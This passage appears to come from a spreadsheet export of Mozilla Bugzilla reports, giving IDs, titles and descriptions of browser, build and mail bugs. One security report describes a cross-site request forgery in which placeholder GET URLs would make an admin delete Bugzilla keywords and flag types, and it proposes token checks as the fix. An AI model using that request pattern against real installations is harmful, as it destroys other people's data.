at the beginning of the second word on the second line.
This should be reproducable on Windows and Linux with default settings. On Mac
you need to set layout.word_select.eat_space_to_next_word to true.
This is a regression from bug 256252.</t>
  </si>
  <si>
    <t>CORE-798304</t>
  </si>
  <si>
    <t>Cant specify sub directories for videos in CameraControl API</t>
  </si>
  <si>
    <t>Changing the file path from VID_0001.3gp to for instance DCIM/VID_0001.3gp when calling cameraObj.startRecording results in an error callback.</t>
  </si>
  <si>
    <t>SEAMONKEY-147372</t>
  </si>
  <si>
    <t>Use .hidden and .collapsed instead of [GS]etAttribute</t>
  </si>
  <si>
    <t>I did some perf testing and GetAttribute(hidden) == true is 40% slower than
.hidden while removeAttribute(hidden) is 25% slower than .hidden = false also
I spotted that CollapseItem() is the same as .collapsed and isn't used anyway :-)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-266536</t>
  </si>
  <si>
    <t>selecting a local mail folder with an out of date db doesn't display contents of folder</t>
  </si>
  <si>
    <t>If you click on a local folder with an out of date db we're supposed to reparse
the folder and then display the contents of the folder. We currently reparse the
folder but we don't display the contents until you click away and click back.</t>
  </si>
  <si>
    <t>TOOLKIT-270215</t>
  </si>
  <si>
    <t>Memory leak in wallet_GetLine</t>
  </si>
  <si>
    <t>I found the following memory leak in a SeaMonkey trunk build using Valgrind:
==6989== 54742 bytes in 4705 blocks are definitely lost in loss record 307 of 312
==6989==    at 0x1B904A90: malloc (vg_replace_malloc.c:131)
==6989==    by 0x1BB36788: PR_Malloc (prmem.c:436)
==6989==    by 0x1BA0B71B: NS_Alloc_P (nsMemoryImpl.cpp:367)
==6989==    by 0x1B97E899: nsMemory::Alloc(unsigned) (nsMemory.h:68)
==6989==    by 0x1BA2AA0C: char* AllocateStringCopy(nsACString
const&amp; char*) (nsReadableUtils.cpp:310)
==6989==    by 0x1BA28AD7: ToNewCString(nsACString const&amp;) (nsReadableUtils.cpp:355)
==6989==    by 0x1C0E0466: wallet_GetLine (wallet.cpp:1133)
==6989==    by 0x1C0E0E36: wallet_ReadFromFile(char const* nsVoidArray*&amp; int
PlacementType) (wallet.cpp:1308)
==6989==    by 0x1C0E3D0C: wallet_Initialize(int) (wallet.cpp:2332)
==6989==    by 0x1C0E8F9E: WLLT_OnSubmit (wallet.cpp:3693)</t>
  </si>
  <si>
    <t>CORE-347171</t>
  </si>
  <si>
    <t>Support atk_text_get_range_extents</t>
  </si>
  <si>
    <t>AT-SPI currently uses atk_text_get_character_extents for its range extents getter but this is being fixed.
Firefox should support atk_text_get_range_extents. This is much faster than multiple calls adding up the extents of characters.</t>
  </si>
  <si>
    <t>CALENDAR-469554</t>
  </si>
  <si>
    <t>Use pluralForm in Task tree - Due In column</t>
  </si>
  <si>
    <t>Created attachment 352916
use pluralForm v1
We are using different strings for 12 and N hours/days in Task tree - Due In column what is insufficient workaround. Let's use pluralForm instead.</t>
  </si>
  <si>
    <t>CORE-425512</t>
  </si>
  <si>
    <t>use of uninitialized variable in nsAccessibleRelationWrap.cpp</t>
  </si>
  <si>
    <t>CORE-439965</t>
  </si>
  <si>
    <t>[FIX]Javascript-based form for posting is not showing up the way that it should</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
When I go to post a new topic on the forum the form that I use which has options for making text bold italics to create hyperlinks etc. will not show up in my browser. I am thinking that it is an issue with how Firefox 3 is rendering Javascript on this particular page.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.websitetoolbox.com/tool/mb/titanscentral
2. Must register a username to post
3. After username registration go to any one of the forums and click on New Post 
Actual Results:  
The menu strip will not render at all.
Expected Results:  
The menu strip should be underneath * Message.
This was an issue before when Firefox 2 was released and it eventually got fixed after I sent the bug in for inspection but now it's an issue again.</t>
  </si>
  <si>
    <t>thompux</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-443263</t>
  </si>
  <si>
    <t>update docs now XML-RPC is no longer in Firefox3</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1a1pre) Gecko/2008070103 Minefield/3.1a1pre
Build Identifier: 
Bug #392845 suggests XML-RPC is no longer available in Firefox 3 and it's vanishing from SeaMonkey.
It's still listed as a Mozilla project at http://www.mozilla.org/projects/xmlrpc/  and some of the links work.
Perhaps the docs on MDC should reflect that it's not part of the product. Besides the page in the URL above
http://developer.mozilla.org/en/docs/XML_Extras has a link to MXR for XML-RPC that doesn't work (LXR finds it MXR only finds it if you point to a branch other than mozilla-central).
If the project is truly dead then www.mozilla.org should also be revamped.  (And mark all the xml-rpc bugs WONTFIX etc.)
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-342410</t>
  </si>
  <si>
    <t>Various modules assume functions are in global scope when none are</t>
  </si>
  <si>
    <t>Bugzilla::User has a bunch of silly calls to &amp;::Param which is not a global function.
Bugzilla::Chart has some calls to &amp;::ThrowUserError which is also not a global function.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-465834</t>
  </si>
  <si>
    <t>Gloda should catch and log exceptions in async database callbacks</t>
  </si>
  <si>
    <t>As described in bug 465831 mozStorage's async callbacks will silently absorb exceptions that propagate up to them without any form of visible output.  Regardless of that issue gloda should probably be catching and logging these exceptions but since there is currently no fallback it's extra important.</t>
  </si>
  <si>
    <t>CORE-180749</t>
  </si>
  <si>
    <t>When a file:// wants to access remote content there must be a line to allow universal privs and the user is presented with dialog to allow and potentially remember.</t>
  </si>
  <si>
    <t>This bug is reported as the issue in the module review and jrgm asked me to make
a bug out of it.
What is persisted? Just that all file:// from now on can access remote? If so
this seems too much shouldn't we persist based on full local URL?
John will provide the test case.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-422500</t>
  </si>
  <si>
    <t>kublad isn't accessible (maybe not running?)</t>
  </si>
  <si>
    <t>I used to be able to see kublad's heartbeat on:  http://10.2.74.37:8778/heartbeat
I can't connect anymore.  Is kublad running?</t>
  </si>
  <si>
    <t>CORE-22598</t>
  </si>
  <si>
    <t>No access to document from a plugin</t>
  </si>
  <si>
    <t>Current plugin API does not allow to access document.</t>
  </si>
  <si>
    <t>BUGZILLA-287544</t>
  </si>
  <si>
    <t>Update Release Info page for 2.18.1 and 2.16.9</t>
  </si>
  <si>
    <t>Update the Release Info page for 2.18.1 when its released</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-178716</t>
  </si>
  <si>
    <t>Update GRE version number in runapp.bat and in the installer(both on trunk and 1.2 branch)</t>
  </si>
  <si>
    <t>20021106 Trunk Build:
Today's gre-based mfcembed app pulled from
ftp://ftp.mozilla.org/pub/mozilla/nightly/2002-11-06-04-trunk/ fails with the
following errors:
1.  If yesterday's mfcembed trunk build is already installed (11-05-08 Trunk)
after installing mfcembed and running runapp.bat a gpf is generated in
XPCOM:EventReceiver
2.  If yesterday's mfcembed build is wiped from the system and today's is then
installed running runapp.bat returns without starting the application and
without any error/warning indication.
Yesterday's mfcembed works with the GRE from yesterday and today.  Today's
mfcembed does not.</t>
  </si>
  <si>
    <t>CORE-139276</t>
  </si>
  <si>
    <t>document.load() return values and synchronous loading</t>
  </si>
  <si>
    <t>According to Microsoft document.load() return value is boolean:
http://msdn.microsoft.com/library/en-us/xmlsdk/htm/xml_mth_hn_2uck.asp?frame=true
We should change our load() method to return boolean (instead of void) and
return false in error conditions. Gotta figure out what kind of error
conditions though...</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-334640</t>
  </si>
  <si>
    <t>faq.php contains two mbody divs</t>
  </si>
  <si>
    <t>You can only have an id once. This is caused by the id being in the wrapper and in faq.tpl</t>
  </si>
  <si>
    <t>CORE-88740</t>
  </si>
  <si>
    <t>tabindex does not work in aligned table</t>
  </si>
  <si>
    <t>Gecko/20010628
Using tabindex in a table with text fields
 e.g. (input type=text name=tab1: size=32 maxlength=50 tabindex=1)
the tabindex is ignored and tab jumps backwards in the document - it only
occures when the table is aligned left or right (center has no problems).
Testcases:
  wrong: www.schoar.de/mozbug/form1.html
  correct: www.schoar.de/mozbug/form2.html
only difference in these testcases
  wrong:   table border=2 align=left
  correct: table border=2</t>
  </si>
  <si>
    <t>TOOLKIT-495595</t>
  </si>
  <si>
    <t>Sort arrows are reversed</t>
  </si>
  <si>
    <t>The directions of sort arrows are reversed by Bug 467844.
For example compare
old: http://mxr.mozilla.org/mozilla1.9.1/source/toolkit/themes/winstripe/global/tree/sort-asc.gif
new: http://mxr.mozilla.org/mozilla1.9.1/source/toolkit/themes/winstripe/global/tree/sort-asc.png</t>
  </si>
  <si>
    <t>dev-null</t>
  </si>
  <si>
    <t>SEAMONKEY-254320</t>
  </si>
  <si>
    <t>Add protocols to ExternalProtocolHandlerExists</t>
  </si>
  <si>
    <t>In bug 241966 we added custom support for certain protocols to launch apps that
are specified in the INI file.
Unfortunately we forgot to add the code into ExternalProtcolHandlerExists so
that when Mozilla asks if we have handlers for those protocols we say yes.</t>
  </si>
  <si>
    <t>CORE-462389</t>
  </si>
  <si>
    <t>XPCVariant used in nsXPCException::SetThrownJSVal can cause cycle collection on non-main threads</t>
  </si>
  <si>
    <t>XPCVariants are cycle collected yet exceptions can be used from any thread. This means that any non-main thread that runs script that throws an exception can trigger cycle collection off the main thread which will most certainly violate a ton of the collector's assumptions.</t>
  </si>
  <si>
    <t>CORE-372170</t>
  </si>
  <si>
    <t>Followup to 371497: fix array usage</t>
  </si>
  <si>
    <t>Created attachment 256828
V1: Reduce array size
Two issues to address:
* instead of '0' entry to close the array use NS_ARRAY_LENGTH
* fix size of array: PRUnichar a[sizeof(PRUnichar)*11] allocates twice than what is needed.
Total savings: Â±0.5K code/text segment</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-122404</t>
  </si>
  <si>
    <t>Home Depot / Expo.com site - Page loading problems</t>
  </si>
  <si>
    <t>See Results for list of problems.
1. go to www.expo.com (which links from homedepot.com)
2. click Shop Online
3. click Drapery Hardware or other category
Results:
-Sometimes a save as box comes up to save the .jsp page
OR
-The page loads with o being the only content on the page. (however the source
code is there.) Then if you go Back then Forward again the content loads
-Product images load very slowly often some appearing broken until you reload
PErformance is fast and fine IE. 
Replicatability: Sometimes
Tested with:
-Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.4) Gecko/20011128
-and 2002012403 build</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-44847</t>
  </si>
  <si>
    <t>mozilla needs to support the -remote command line flag</t>
  </si>
  <si>
    <t>There are two phases to this.  We need a component that supports the actual
command line flag ( easy ) and some xlib that talks to the X server and tries to
find a running browser instance and talks to it.  We can't use the existing gtk
code for this since it means that we have to start up the component initialize
everything and if an instance is not running shutdown and restart.  We can't
really do that with the gtk component right now.</t>
  </si>
  <si>
    <t>TOOLKIT-386959</t>
  </si>
  <si>
    <t>crashreporter gets wrong restart arguments for xulrunner apps</t>
  </si>
  <si>
    <t>This only affects xulrunner apps started _not_ with the stub but via 
xulrunner application.ini
The crashreporter gets only the path to the xulrunner binary in that case and
therefore displays the Restart button but only raise the xulrunner usage description.
Since I still can't use the stub in my application I need another solution for that:
- don't display the Restart button if we get xulrunner as argv[0]
or
- make sure the application file is recognized by the crash reporter
I had a look at the latter option but I'm not sure why that doesn't work
right now.
The xulrunner binary removes the application.ini file from argv and sets
XUL_APP_FILE as env variable. I would expect that this env variable is still
available in the crashreporter environment as it's the case for the MOZ_CRASHREPORTER_RESTART_ARGS_* variables but somehow it's not.</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-381870</t>
  </si>
  <si>
    <t>PRD Change Request</t>
  </si>
  <si>
    <t>Change PLCS-003d from P2 to P1</t>
  </si>
  <si>
    <t>When going over the blockers list mconnor and I both got confused as to why we'd downgraded the requirement to ensure that Firefox 3 can export bookmarks in a format that's usable by other applications to a P2. This feels very important to us and we've marked bug 374529 as a blocker so we'd like to see this move to a P1.</t>
  </si>
  <si>
    <t>CORE-424614</t>
  </si>
  <si>
    <t>restore the honour of jsdbgapi.h and js_XDRScript</t>
  </si>
  <si>
    <t>I led crowder astray in how to keep traps from being serialized and missed a flow-control error to boot Brendan's righteous grumpiness can be seen in https://bugzilla.mozilla.org/show_bug.cgi?id=424405#c14 and subsequent.  Assigning to him because he has a patch not because he's responsible for cleaning up after me and crowder!</t>
  </si>
  <si>
    <t>BUGZILLA-213831</t>
  </si>
  <si>
    <t>Update is ambiguous/confusing to sleepy admins</t>
  </si>
  <si>
    <t>I was staring at the bug counts for the Thunderbird product in the edit
thunderbird page. and there was this button labeled 'Update' so since i wanted
to see the current bug couunt I clicked it.
Expected results (as expected by sleepy admin):
Update the page info based on the current data especially the bug count.
Actual results (as written by a non sleepy developer)
Updated Thunderbird
Go back to edit some /other/ product.
No way for me to go back and edit the product I changed to get current numbers.
If people sympathize with this sleepy developer then we can make any of the
following changes
A. 'update' would redisplay the current product
B. 'update' would commit changes and then redisplay the current product
C. 'update' is renamed to something else that isn't ambiguous to the sleep deprived.
D. the 'update'd page would have a link to edit the updated product.
- and the severity would be changed to enhancement...</t>
  </si>
  <si>
    <t>CORE-522123</t>
  </si>
  <si>
    <t>Indirect eval befuddles scopeChain</t>
  </si>
  <si>
    <t>obj_eval doesn't succeed in using the global object for indirect eval calls:
$ obj~/js
js&gt; evil=eval
function eval() {[native code]}
js&gt; let (x=1) { print (evil(x)) }
1
js&gt; 
The underlying problem is that while the 'if indirectCall' code does swap out the frame's scopeChain if there are lexical blocks on caller-&gt;blockChain the subsequent call to js_GetScopeChain re-clones them uses them for the compile and execute and then drops them when it restores the frame's original scopeChain.
These double clones never get their variables copied out of their stack frames when the frames are popped so you can get functions that have closed over blocks pointing to popped frames:
$ cat ~/mc/b/strict/eval-scope-2.js
evil=eval
var f g
let (x=1) {
  evil(f=function () { return x })
  x++
}
print(f())
$ obj~/js ~/mc/b/strict/eval-scope-2.js
function print() {
    [native code]
}
$ 
I think I have a patch for this.</t>
  </si>
  <si>
    <t>CORE-96524</t>
  </si>
  <si>
    <t>remove xpcom/appshell</t>
  </si>
  <si>
    <t>this directory is not needed and should not be compiled nor pulled.</t>
  </si>
  <si>
    <t>CORE-144269</t>
  </si>
  <si>
    <t>Save link target doesn't work in Yahoo mail</t>
  </si>
  <si>
    <t>This is a regression from Mozilla 0.9.9
Reproduce:
1) go to yahoo mail open your inbox to the list of messages.
2) right click on the message subject line and choose Save Link Target As...
3) This will default to saving as ShowLetter.html
4) Open ShowLetter.html and it's an error message about an expired session.  I
believe this is related to cookie handling.
Note:
This works great under Mozilla 0.9.9.
Left-clicking to open the message in Mozilla works fine in all versions.</t>
  </si>
  <si>
    <t>toorffej</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-216022</t>
  </si>
  <si>
    <t>Unresolved reference when trying to compile static Firebird cvs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i586 en-US rv:1.5b) Gecko/20030802 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (X11 U Linux i586 en-US rv:1.5b) Gecko/20030802 Mozilla Firebird/0.6.1
I've been trying to compile static MozFirebird cvs on redhat 9 this way:
# create ~/.mozconfig
export CVSROOT=:pserver:anonymous@cvs-mirror.mozilla.org:/cvsroot
cvs co mozilla/client.mk
cd mozilla
make -f client.mk checkout
make -f client.mk build
My .mozconfig:
export MOZ_PHOENIX=1
mk_add_options MOZ_PHOENIX=1
ac_add_options --enable-static
ac_add_options --disable-shared
ac_add_options --prefix=/opt/MozillaFirebird
ac_add_options --enable-crypto
ac_add_options --disable-tests
ac_add_options --disable-debug
ac_add_options --disable-mailnews
ac_add_options --disable-composer
ac_add_options --disable-ldap
ac_add_options --enable-optimize=-Os -march=k6-3 -pipe -fomit-frame-pointer
ac_add_options --enable-default-toolkit=gtk2
ac_add_options
--enable-extensions=default-inspector-irc-venkman-content-packs-help
ac_add_options --enable-plaintext-editor-only
ac_add_options --enable-strip
ac_add_options --enable-strip-libs
ac_add_options --enable-xft
ac_add_options --with-system-zlib
ac_add_options --with-system-jpeg
ac_add_options --with-system-png
I've got this error:
c++ -o MozillaFirebird-bin -Os -march=k6-3 -pipe -fomit-frame-pointer 
-I/usr/X11R6/include -fno-rtti -fno-exceptions -Wall -Wconversion
-Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy
-pedantic -Wno-long-long -fshort-wchar -pthread -pipe  -DNDEBUG -DTRIMMED -Os
-march=k6-3 -pipe -fomit-frame-pointer  nsBrowserApp.o nsStaticComponents.o    
-L../../dist/bin -L../../dist/lib -L../../dist/lib/components -lxpcom_compat_c
-lxpconnect -luconv -lucvmath -li18n -loji -lipcdc -lnecko -lnecko2 -lpref
-lcaps -lrdf -lhtmlpars -lgfxps -lgfxxprint -lgfx_gtk -limglib2 -lgkplugin
-ljsdom -lwidget_gtk2 -lxremote_client -lgklayout -lmork -ldocshell -lprofile
-lnsprefm -lembedcomponents -lwebbrwsr -leditor -ltxmgr -lnsappshell -lchrome
-laccessibility -lfileview -lmozfind -lxremoteservice -lappcomps -ltoolkitcomps
-lcookie -lwallet -lwalletviewers -lxmlextras -lp3p -lautoconfig -lsystem-pref
-ltransformiix -luniversalchardet -ltypeaheadfind -lwebsrvcs -lpipboot
-lpipnss-lpippki -lbrowsercomps -lunicharutil_s -lucvutil_s -ljsj -lgtkxtbin
-lgfxshared_s -lgfxft2_s -lxlibrgb -lxprintutil -lgkgfx -lxulapp_s
../../dist/lib/libxulapp_s.a -L../../dist/bin -lmozjs -L../../dist/bin -lxpcom 
-L/home/acrozy/mozilla/dist/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl 
-Wl--export-dynamic -lgtk-x11-2.0 -lgdk-x11-2.0 -latk-1.0 -lgdk_pixbuf-2.0 -lm
-lpangoxft-1.0 -lpangox-1.0 -lpango-1.0 -lgobject-2.0 -lgmodule-2.0 -ldl
-lglib-2.0    -ldl -lm  -L../../dist/lib/components -lpng  -ljpeg  -lz  
-L../../dist/bin -L../../dist/lib ../../dist/lib/libcrmf.a -lsmime3 -lssl3
-lnss3 -lsoftokn3   -L/usr/X11R6/lib -lXt -L/usr/X11R6/lib -lXp -lXext -lX11
-L../../dist/lib -lxpcom_compat
nsStaticComponents.o(.text+0x31d): In function `nsSystemPrefModule_NSGetmodule':
: undefined reference to `nsSystemPrefModule_gModuleInfo'
with --enable-static and --disable-shared removed I successfully finish compiling.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>vaidrius</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-472864</t>
  </si>
  <si>
    <t>MacOSX 10.4 comm-central bloat build is awol</t>
  </si>
  <si>
    <t>The box seemed to timeout &amp; reconnect earlier today but it hasn't started doing builds again.</t>
  </si>
  <si>
    <t>CORE-459953</t>
  </si>
  <si>
    <t>A SVGPathSegCurvetoCubicSmoothAbs says its pathSegTypeAsLetter is Q and a SVGPathSegCurvetoQuadraticAbs says its pathSegTypeAsLetter is S.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fi rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 fi rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
When a path is used to create its segments and they are inserted into it the xml representation is correct (as per firebug) but the pathSegList.getItem(0).pathSegTypeAsLetter returns wrong values for SVGPathSegCurvetoQuadraticAbs:ses and SVGPathSegCurvetoCubicSmoothAbs:ses return wrong letters.
Reproducible: Always
Steps to Reproduce:
1.Have any page open. Even a simple like:
Letters fail
	Sorry this isn't one of those visually impressive problems.
Will suffice.
2. Execute the following code:
var svgns=http://www.w3.org/2000/svg
var path1=document.createElementNS(svgnspath)
var sseg=path1.createSVGPathSegCurvetoCubicSmoothAbs(50402060)
path1.pathSegList.appendItem(sseg)
var path2=document.createElementNS(svgnspath)
sseg=path2.createSVGPathSegCurvetoQuadraticAbs(50402060)
path2.pathSegList.appendItem(sseg)
alert(Should be S:+path1.pathSegList.getItem(0).pathSegTypeAsLetter)
alert(Should be Q:+path2.pathSegList.getItem(0).pathSegTypeAsLetter)
3.The alerts should state the problem. For Google Chrome and Opera show the correct ones so I'm pretty sure I'm not the one who's mixed up the letters.
Actual Results:  
Well the given letters are not the same as they are in the dom's view of the xml (seen from firebug) and the specification. This is shown by the alert boxes.
Expected Results:  
The SVGPathSegCurvetoQuadraticAbs should have Q as its pathSegTypeAsLetter and the SVGPathSegCurvetoCubicSmoothAbs S.</t>
  </si>
  <si>
    <t>Mitten.O</t>
  </si>
  <si>
    <t>CORE-332603</t>
  </si>
  <si>
    <t>Problem with Dropdown-Box and position:absolute</t>
  </si>
  <si>
    <t>There is a problem in current Trunk-Gecko when
using a Dropdown-Box with position:absolut.
The List of the Dropdown appears in the top-left corner.
Regression-Range: 200603260155-200603270026 CET
Testcase following</t>
  </si>
  <si>
    <t>THUNDERBIRD-459474</t>
  </si>
  <si>
    <t>Cannot open some PDF attachments</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: version 2.0.0.17 (20080914)
Problem started several months ago - formerly no problem.
Attempting to open PDF attachment shows Download Error: Can't open etc. . . change association in preferences.
But that reads OK: PDFs - Action: Open with Adobe Reader 9.0.  So no reason why it doesn't do so.
Always have to save attachment to desktop then open with Adobe Reader 9.0 with no problem    
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>peter.ashford</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-351722</t>
  </si>
  <si>
    <t>No Talkback in Mac trunk nightlies since ca. 25 August</t>
  </si>
  <si>
    <t>CaminoTrunk builds stopped getting Talkback included in early August due to a build error:
CmTrunk on 08/06 01:15:00 is good
CmTrunk on 08/06 08:32:00 is bad
Tinderbox logs for Minefield's Mac build machines disappear before that point but so far I've gone back (via builds) to 2006-08-01-04 and not found Talkback.  (The talkback@mozilla.org extension folder gets created but the actual binary is missing.)
I'll attach a snippet of today's CmTrunk log with the build errors just for easy reference.</t>
  </si>
  <si>
    <t>SEAMONKEY-244231</t>
  </si>
  <si>
    <t>use pdb files for debug symbols</t>
  </si>
  <si>
    <t>We should use pdb files (rather than CV debug info) for debug symbols on
Windows since CV has a type data limitation that breaks it for static builds. 
The Talkback server supports pdb symbols now.</t>
  </si>
  <si>
    <t>WEBSITES-859890</t>
  </si>
  <si>
    <t>plugins.mozilla.org</t>
  </si>
  <si>
    <t>Bad reporting from firefox plugin checker for adobe shockwave for director 12.0.2.122 (similar to Bug 546727 but not resolved for this version of adobe)</t>
  </si>
  <si>
    <t>Created attachment 735260
adobe.7z
User Agent: Mozilla/5.0 (Windows NT 5.1 rv:20.0) Gecko/20100101 Firefox/20.0
Build ID: 20130326150557
Steps to reproduce:
after uninstalling and clearing all traces for shockwave director and restarti'n comp - repeated installation with the same effect - shown in attachment screenshots</t>
  </si>
  <si>
    <t>waldi966</t>
  </si>
  <si>
    <t>CORE-356466</t>
  </si>
  <si>
    <t>nsIEditor IID needs revision new ownership model needs documentation</t>
  </si>
  <si>
    <t>Bug 278677 made pretty drastic changes to the behavior of part of nsIEditor but didn't document the new behavior nor rev the IID.  We need to do both but especially the latter.</t>
  </si>
  <si>
    <t>CORE-355430</t>
  </si>
  <si>
    <t>Stack information of uncaught Error object should be available in window.onerror</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Firefox supports window.onerror from Internet Explorer as a way of handling any JavaScript errors that go uncaught: 
window.onerror = function(msg url line) {
  ...
}
When this function is invoked in Internet Explorer the JavaScript stack from when the error was thrown is available using arguments.caller/callee. In IE it's as though the exact line where the error was caused calls the window.onerror function.
In Firefox the stack information is not available in this way. 
I think the best thing to do (and which I wish IE did) rather than calling onerror with the stack intact is to expose the actual object that was thrown and not caught. In Fx this object already has the stack property which will provide a good amount of information about the state of the JavaScript stack when the error was thrown. Additionally any object that custom JavaScript code throws should also be available in the onerror function. 
So I can think of two quick and dirty ways of exposing the thrown object. One is to add a fourth parameter to the onerror function:
window.onerror = function(msg url line err) {
  ...
}
Another would be to save the last uncaught error as a property of the window object:
window.onerror = function(msg url line) {
  var err = window._mozLastError
}
I think that this change would be very helpful for developers working on complex JavaScript applications. We are used to Java where we can wrap the main() function in a try/catch+print-stack-trace statement for diagnosis of any problem. Because JavaScript+Browser has so many possible entry points (event handlers window.setTimeout  loading etc) there is not an easy idiom to use that replicate this catch-all functionality. window.onerror is the obvious mechanism to use but to be fully useful it needs to somehow expose the state of the stack when the error was raised.
Reproducible: Always
Steps to Reproduce:
window.onerror = function(msg url line) {
  window.alert(Hey no access to the stack!)
}
var willthrow = nothing.nope.nada // an error</t>
  </si>
  <si>
    <t>evilpies</t>
  </si>
  <si>
    <t>CORE-299268</t>
  </si>
  <si>
    <t xml:space="preserve"> fails to open the body automatically</t>
  </si>
  <si>
    <t>As pointed out in bug 289537 comment 21  does not open a 
automatically. I should have tested instead of just trusting nsElementTable.
As a note: I cannot make  open a body automatically as
requested in bug 289537 comment 21 because it would regress bug 66985 (which has
a couple of dupes).</t>
  </si>
  <si>
    <t>BUGZILLA-258709</t>
  </si>
  <si>
    <t>Expansion of voteremovedmail should honour emailsuffix</t>
  </si>
  <si>
    <t>NSS-398882</t>
  </si>
  <si>
    <t>leading ** in ignored file matches all leaks</t>
  </si>
  <si>
    <t>recently the ignored file was updated with a new entry:
**/some/stack/**
Our scripts (both the old and the new treat ** as 'match all the rest' rather than match any number of stacks.
Updating our scripts to the new semantic may be a good idea but until then we should remove this entry in the ignore file (which will match any stack currently).
bob</t>
  </si>
  <si>
    <t>CORE-99208</t>
  </si>
  <si>
    <t>nsIOutlinerView should use atoms for colID</t>
  </si>
  <si>
    <t>Outliner view should get colIDs as atoms instead/addition to strings to avoid
funky coding like around
http://lxr.mozilla.org/seamonkey/source/mailnews/base/src/nsMsgDBView.cpp#923
The implementation of outliner already has an atom for the colID it just
doesn't pass it on...</t>
  </si>
  <si>
    <t>risto.kankkunen</t>
  </si>
  <si>
    <t>BUGZILLA-466692</t>
  </si>
  <si>
    <t>[SECURITY] keywords and unused flag types can be deleted by bypassing the token check</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #281181 +++
This may have been covered before a long time ago and not been considered an issue but if I could get an admin to click on the following URLs (which are intentionally broken to avoid any accidents but you get the point) this could really mess things up couldn't it? 
http://[webserver]/editkeywords.cgi?action=delete&amp;id=[number]
http://[webserver]/editflagtypes.cgi?action=confirmdelete&amp;id=[number]
... and especially if it is in fact a script or a page with embedded images or iframes enumerating all possible values of [number].
Would it make sense for an equivalent token to be embedded in the URL for keyword/flag/(etc.?) deletion? ... or for any other significant privileged action accessed via GET?
A malicious user would not know what to supply to make an admin click on (e.g.):
http://[webserver]/editkeywords.cgi?action=delete&amp;id=[number]&amp;token=[token]
... and unlike all possible values of [number] certainly couldn't enumerate all possible values of [token] too.</t>
  </si>
  <si>
    <t>CORE-125466</t>
  </si>
  <si>
    <t>Add CString and UTF8String support to XPCOM's proxy event mechanism</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-266790</t>
  </si>
  <si>
    <t>the prototypes for CopyUTF8toUTF16 and CopyUTF16toUTF8 are both wrong and confusing</t>
  </si>
  <si>
    <t>if both params are const then how can it do any work?!</t>
  </si>
  <si>
    <t>NSS-372388</t>
  </si>
  <si>
    <t>False failures when waiting for selfserv.</t>
  </si>
  <si>
    <t>Issue with wait_for_selfserv() function in ssl.sh:
1. Tstclnt doesn't wait so sometimes happened that selfserv is not already started and failure is reported.
2. If tstclnt can't connect selfserv then it's tested once more but results are not processed.
Suggestion:
1. Wait 5 seconds before testing if tstclnt can connect to selfserv.
2. Remove second try (5 seconds should be enough).</t>
  </si>
  <si>
    <t>SEAMONKEY-11309</t>
  </si>
  <si>
    <t>SUNWspro needs NSCAP_DISABLE_DEBUG_PTR_TYPES</t>
  </si>
  <si>
    <t>Without NSCAP_DISABLE_DEBUG_PTR_TYPES a SUNWspro 4.2 (and likely 5.0)
build runs into linking problems.
Index: configure.in
===================================================================
RCS file: /cvsroot/mozilla/configure.inv
retrieving revision 1.406
diff -u -r1.406 configure.in
--- configure.in        1999/08/05 01:50:24     1.406
+++ configure.in        1999/08/05 03:36:29
@@ -4676 +4677 @@
 *-solaris*)
     AC_DEFINE(BROKEN_QSORT)
     if test ! $GNU_CC then
+       AC_DEFINE(NSCAP_DISABLE_DEBUG_PTR_TYPES)
        LDFLAGS='-xildoff'
        MKSHLIB='$(CXX) $(DSO_LDOPTS)'
        MKCSHLIB='$(CC) $(DSO_LDOPTS)'</t>
  </si>
  <si>
    <t>briano</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-402372</t>
  </si>
  <si>
    <t>Problems creating and deleting mailing lists in address books.</t>
  </si>
  <si>
    <t>Created attachment 287250
The fix
With current trunk I can't delete mailing lists. There's also a bunch of errors thrown on create.
Its a regression from bug 394781 - we're trying to get ab databases on mailing lists that happen to not get fully initialized (in terms of pref id). The solution is to use the directory that we're currently in to get the database from rather than getting the database from the mailing list that gets it from the parent that is the one we were in...
Patch attached to fix the regression and make things simpler.</t>
  </si>
